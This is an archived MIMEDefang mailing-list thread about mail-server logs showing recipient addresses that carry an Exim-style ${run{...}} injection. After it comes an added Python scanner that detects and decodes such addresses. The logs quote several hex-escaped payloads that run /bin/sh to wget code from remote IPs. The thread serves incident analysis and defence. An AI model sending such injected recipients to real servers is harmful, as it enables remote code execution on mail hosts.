[Mimedefang] Carefully Crafted Recipient executes script?
Paul Murphy
pjm at ousekjarr.org
Tue Jun 25 17:31:23 EDT 2019
Interesting - on review of my logs, I had one of these about a week ago:
Jun 19 15:11:46 baldur mimedefang.pl[29364]: x5JEBkA2001099: x5JEBkA2001099: SPF_check on 46.101.19.140 (<support at service.com>) helo service.com
Jun 19 15:11:46 baldur sendmail[1099]: x5JEBkA2001099: ruleset=check_rcpt, arg1=<root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x2064.50.180.45\\x2ftmp\\x2f82.70.29.206\\x22}}@Ready>, relay=[46.101.19.140], reject=550 5.7.1 <root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x2064.50.180.45\\x2ftmp\\x2f82.70.29.206\\x22}}@Ready>... Relaying denied. IP name lookup failed [46.101.19.140]
Jun 19 15:11:46 baldur sendmail[1099]: x5JEBkA2001099: [46.101.19.140]: Possible SMTP RCPT flood, throttling.
Jun 19 15:11:47 baldur sendmail[1099]: x5JEBkA2001099: ruleset=check_rcpt, arg1=<root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x2064.50.180.45\\x2ftmp\\x2f82.70.29.206\\x22}}@Ready>, relay=[46.101.19.140], reject=550 5.7.1 <root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x2064.50.180.45\\x2ftmp\\x2f82.70.29.206\\x22}}@Ready>... Relaying denied. IP name lookup failed [46.101.19.140]
Jun 19 15:11:48 baldur mimedefang.pl[29364]: x5JEBkA2001099: DEBUG: Checking sender/recipient for ip=46.101.19.140,sender=<support at service.com>,recipient=<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f82.70.29.206\x22}}@localhost>,fullrecip=root at localhost
Jun 19 15:11:48 baldur mimedefang.pl[29364]: x5JEBkA2001099: MDLOG,x5JEBkA2001099,bad_recip,0,46.101.19.140,<support at service.com>,<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f82.70.29.206\x22}}@localhost>,?
Jun 19 15:11:48 baldur mimedefang.pl[29364]: x5JEBkA2001099: filter_recipient rejected recipient <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f82.70.29.206\x22}}@localhost>
Jun 19 15:11:48 baldur sendmail[1099]: x5JEBkA2001099: Milter: to=<root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x2064.50.180.45\\x2ftmp\\x2f82.70.29.206\\x22}}@localhost>, reject=554 5.7.1 Invalid user address - not known here
Jun 19 15:11:48 baldur sendmail[1099]: x5JEBkA2001099: from=<support at service.com>, size=0, class=0, nrcpts=0, proto=SMTP, daemon=MTA, relay=[46.101.19.140]
I keep copies of rejected messages for 2 days for exactly this sort of reason, but unfortunately this is long gone.
However, the relaying restrictions in Sendmail rejected the message even while MIMEDefang was thinking about it.
Best Wishes,
Paul.
-----Original Message-----
From: MIMEDefang [mailto:mimedefang-bounces at lists.roaringpenguin.com] On Behalf Of Stefan Schoeman
Sent: 25 June 2019 21:26
To: mimedefang at lists.roaringpenguin.com
Subject: [Mimedefang] Carefully Crafted Recipient executes script?
Hoping someone can assist me with this...
I just came across an email processed by MIMEDefang that seems to have had a specially crafted recipient. It seems as if the crafted recipient managed to coerce either my mimedefang-filter, or MIMEDefang itself, to actually execute script. The recipient was recorded as:
<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2065.181.120.163\x2fstfinracu\x22}}@server>
which looks as if it tried to execute /bin/sh -c "wget 65.181.120.163/stfinracu", with at least some partial success, because the .INPUTMSG file resulted in:
Received: 1
Received: 2
Received: 3
...
...
Received: 31
A SpamAssassin scan of this file then yielded:
1.2 MISSING_HEADERS Missing To: header
1.8 MISSING_SUBJECT Missing Subject: header
2.3 EMPTY_MESSAGE Message appears to have no textual parts and no Subject: text
1.0 MISSING_FROM Missing From: header
0.0 MSGID_FROM_MTA_HEADER Message-Id was added by a relay
1.4 MISSING_DATE Missing Date: header
which seems to indicate that this lot happened before SpamAssassin ran in filter_end.
My logfile indicated the following:
Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: from=<root at 208.com>, size=395, class=0, nrcpts=1, msgid=<201906251921.x5PJLcKV004747 at --->, proto=SMTP, daemon=MTA, relay=minecraft.good-gaming.com [34.228.4.69]
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: DEBUG: GeoIP lookup of 34.228.4.69 is 'US'
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: DEBUG REPLYTO=, SENDER=<root at 208.com>, FROM=
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: SpamAssassin Result : 7.715
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: Mail Subject :
x5PJLcKV004747 : : 2 : 7.715 : 0.85136 : <root at 208.com> : <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2065.181.120.163\x2fstfinracu\x22}}@server> : 34.228.4.69 : 395
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: filter: discard=1
Jun 25 21:21:41 smtp mimedefang[17340]: x5PJLcKV004747: Discarding because filter instructed us to
Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: Milter: data, discard
Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: discarded
I would very much like to hear the community's opinion on this and how I can protect against this?
Thanks in advance!
Stefan
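The `${run{...}}` construct in the recipients quoted in both messages is an Exim-style string-expansion item. Neither Sendmail nor MIMEDefang performs string expansion on an address, so on this setup the local part is just an odd string that is passed to `filter_recipient` and then rejected; its presence is nevertheless a useful indicator to hunt for in mail logs and to refuse at RCPT time. The following is an added example, not code from this thread or from the MIMEDefang project: a small Python scanner that pulls recipient fields out of sendmail and mimedefang.pl syslog lines, decodes the `\xNN` and `\t` escapes so an analyst can read the embedded command, and a verdict helper shaped like the `(action, message)` pair that MIMEDefang's `filter_recipient` returns (the same regex check can be placed in that hook in mimedefang-filter). The sample input is two lines quoted from the thread above, kept with the archive's "at" obfuscation, plus one constructed benign line; all function names are my own.

```python
from __future__ import annotations

import re
from typing import Optional

# An Exim-style ${run{...}} string-expansion item. Sendmail and MIMEDefang never
# expand such strings, so its presence in an address is itself the indicator.
RUN_EXPANSION = re.compile(r"\$\{run\{(.*?)\}\}")
# Any ${...} expansion item at all marks the address as abnormal.
ANY_EXPANSION = re.compile(r"\$\{")
# Recipient fields as sendmail (to=, arg1=) and mimedefang.pl (recipient=) log them.
RECIPIENT_FIELD = re.compile(r"(?:to|recipient|arg1)=<([^>]*)>")


def decode_escapes(s: str) -> str:
    """Render the \\xNN and \\t escapes the payload uses to avoid literal spaces and slashes.

    sendmail doubles backslashes when it writes an address to syslog; mimedefang.pl
    does not, so both spellings are accepted here.
    """
    s = s.replace("\\\\", "\\")
    s = re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)
    return s.replace("\\t", "\t")


def analyze_recipient(addr: str) -> Optional[dict]:
    """Return a finding for an address carrying an expansion item, else None."""
    if not ANY_EXPANSION.search(addr):
        return None
    local_part, _, domain = addr.rpartition("@")
    finding = {"address": addr, "local_part": local_part, "domain": domain, "command": None}
    m = RUN_EXPANSION.search(addr)
    if m:
        # Collapse tabs and spaces so the command reads as an analyst would type it.
        finding["command"] = " ".join(decode_escapes(m.group(1)).split())
    return finding


def recipient_verdict(addr: str) -> tuple[str, str]:
    """Mirror the (action, message) pair MIMEDefang's filter_recipient returns."""
    if analyze_recipient(addr) is not None:
        return ("REJECT", "Recipient address contains a string-expansion item")
    return ("CONTINUE", "ok")


def scan_log(lines) -> list[dict]:
    """Collect findings from syslog lines, one per distinct decoded command and domain."""
    findings: list[dict] = []
    seen: set[tuple] = set()
    for line in lines:
        for addr in RECIPIENT_FIELD.findall(line):
            f = analyze_recipient(addr)
            if f is None:
                continue
            key = (f["command"], f["domain"])
            if key in seen:
                continue
            seen.add(key)
            findings.append(f)
    return findings


# Sample input: one constructed benign line, then two lines quoted from the thread.
SAMPLE_LOG = [
    "Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: Milter: to=<alice@example.org>, accepted",
    r"Jun 19 15:11:48 baldur mimedefang.pl[29364]: x5JEBkA2001099: DEBUG: Checking sender/recipient for ip=46.101.19.140,sender=<support at service.com>,recipient=<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f82.70.29.206\x22}}@localhost>,fullrecip=root at localhost",
    r"Jun 19 15:11:48 baldur sendmail[1099]: x5JEBkA2001099: Milter: to=<root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x2064.50.180.45\\x2ftmp\\x2f82.70.29.206\\x22}}@localhost>, reject=554 5.7.1 Invalid user address - not known here",
]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['domain']}: {f['command']}")
    for a in ("alice@example.org", RECIPIENT_FIELD.findall(SAMPLE_LOG[1])[0]):
        print(recipient_verdict(a))
```

Both quoted lines carry the same address, once with single and once with doubled backslashes, and the scanner reports it as a single finding once the escapes are decoded. Keying the de-duplication on the decoded command rather than the raw string is what makes the sendmail and mimedefang.pl spellings collapse together.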